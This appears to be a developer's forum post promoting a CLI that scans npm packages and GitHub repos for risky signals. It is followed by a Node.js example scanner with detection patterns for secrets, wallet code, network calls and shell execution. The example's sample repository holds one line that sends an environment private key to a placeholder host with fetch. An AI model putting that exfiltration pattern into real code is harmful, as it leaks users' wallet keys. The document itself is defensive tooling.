Hey everyone,
I shared this earlier as a CLI to analyse npm packages before installing.
Since then, I’ve added something I think is even more useful:
👉 You can now scan GitHub repos before cloning or running them
npx guard-install --repo https://github.com/user/repo
Why this matters
There’s a growing pattern (especially in crypto interviews / side projects):
“Clone this repo and run it locally”
Some of these repos:
- access environment variables
- interact with wallets / keys
- make outbound network calls
You don’t always notice what’s happening before you run the code.
What the repo scan does
- Scans files (without executing anything)
- Detects:
  - sensitive data patterns (PRIVATE_KEY, MNEMONIC)
  - crypto/wallet usage
  - network calls
  - shell execution
- Combines signals → gives a risk level (LOW / MEDIUM / HIGH)
- Explains why something might need review
Example
🔐 Sensitive data patterns found
💰 Cryptocurrency functionality
🌐 Network activity detected
Risk: MEDIUM — Sensitive domain with multiple relevant signals
Links
GitHub: https://github.com/dasanakudigenithin/guard-install
npm: https://www.npmjs.com/package/guard-install
DEV.to: https://dev.to/nithindj192/npm-installs-packages-blindly-i-built-a-cli-to-fix-that-1dd
Still early, but getting more practical now.
Would love feedback on:
- Are these signals useful or noisy?
- What would make you trust a HIGH risk warning?
- Would you use this before running unknown repos?
Thanks!
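To make the "scan without executing, match signals, combine into a risk level" idea concrete, here is an added Node.js example. It is not guard-install's own code and does not reproduce its rules: the signal regexes, the category names, the weighting that maps signal combinations to LOW / MEDIUM / HIGH, and the in-memory sample repository are all this example's own assumptions. Files are passed in as a path-to-contents map so the example runs offline; a real scanner would walk the cloned directory instead.

```javascript
// Added example, not guard-install's own code: a minimal static "signal
// scanner" in the spirit of the post. It never executes anything from the
// repository; it only reads source text, matches signal patterns, and
// combines the hits into a LOW / MEDIUM / HIGH risk level plus the reasons.

// Signal catalogue. The regexes and category names are this example's own
// assumptions, not the tool's rules; a real scanner would need many more.
const SIGNALS = [
  { category: 'sensitive', re: /\b(PRIVATE_KEY|MNEMONIC|SEED_PHRASE)\b/, reason: 'Sensitive data patterns found' },
  { category: 'crypto',    re: /\b(ethers|web3|bitcoinjs-lib|Wallet)\b/,   reason: 'Cryptocurrency functionality' },
  { category: 'env',       re: /\bprocess\.env\b/,                         reason: 'Reads environment variables' },
  { category: 'network',   re: /\b(fetch|axios|https?\.request|WebSocket)\s*\(/, reason: 'Network activity detected' },
  { category: 'shell',     re: /\b(child_process|execSync|spawnSync|spawn|exec)\b/, reason: 'Shell execution' },
];

// Scan an in-memory map of { path: fileContents }. A real tool would walk the
// cloned directory and read each file; keeping the input in memory keeps this
// example runnable offline. Returns one finding per (file, line, signal).
function scanFiles(files) {
  const findings = [];
  for (const [path, text] of Object.entries(files)) {
    if (path.startsWith('node_modules/')) continue; // third-party code is out of scope here
    text.split('\n').forEach((line, i) => {
      for (const sig of SIGNALS) {
        if (sig.re.test(line)) {
          findings.push({ category: sig.category, reason: sig.reason, file: path, line: i + 1 });
        }
      }
    });
  }
  return findings;
}

// Combine signals into a risk level. The weighting is an assumption chosen to
// reproduce the post's example: a sensitive domain (secrets or wallet code) is
// MEDIUM when it comes with other signals, and HIGH when paired with shell execution.
function assessRisk(findings) {
  const cats = new Set(findings.map(f => f.category));
  const sensitiveDomain = cats.has('sensitive') || cats.has('crypto');
  const reasons = [...new Set(findings.map(f => f.reason))]; // deduplicated, first-seen order
  let level = 'LOW';
  let summary = 'No notable signals';
  if (sensitiveDomain && cats.has('shell')) {
    level = 'HIGH';
    summary = 'Sensitive domain combined with shell execution';
  } else if (sensitiveDomain && cats.size >= 2) {
    level = 'MEDIUM';
    summary = 'Sensitive domain with multiple relevant signals';
  } else if (cats.has('shell') || cats.size >= 2) {
    level = 'MEDIUM';
    summary = 'Multiple signals outside a sensitive domain';
  } else if (cats.size === 1) {
    summary = 'Single signal; likely benign but worth a glance';
  }
  return { level, summary, reasons, findings };
}

// Constructed sample repository (not a real project) with the shape the post
// warns about: reads a secret from the environment, builds a wallet, and
// sends data out over the network.
const SAMPLE_REPO = {
  'README.md': '# demo\nRun `npm start` to launch the app.',
  'package.json': '{ "name": "demo", "scripts": { "start": "node src/wallet.js" } }',
  'src/wallet.js': [
    "const { ethers } = require('ethers');",
    "const key = process.env.PRIVATE_KEY;",
    "const wallet = new ethers.Wallet(key);",
    "fetch('https://example.invalid/report', { method: 'POST', body: JSON.stringify({ key }) });",
  ].join('\n'),
};

// Render the report the way the post's example does: reasons, then the level
// with its explanation, then the file:line evidence for each signal.
function formatReport(report) {
  const lines = report.reasons.map(r => `- ${r}`);
  lines.push(`Risk: ${report.level} - ${report.summary}`);
  for (const f of report.findings) lines.push(`  ${f.file}:${f.line} ${f.category}`);
  return lines.join('\n');
}

console.log(formatReport(assessRisk(scanFiles(SAMPLE_REPO))));
```

Run it with `node scan-example.js` (any filename). The sample repository lands on MEDIUM with the same explanation as the post's example; adding a file that calls `child_process` on top of the secret and wallet signals is what tips it to HIGH. Keeping the file:line evidence in the report is what lets a reader judge whether a signal is useful or noisy instead of trusting the level alone.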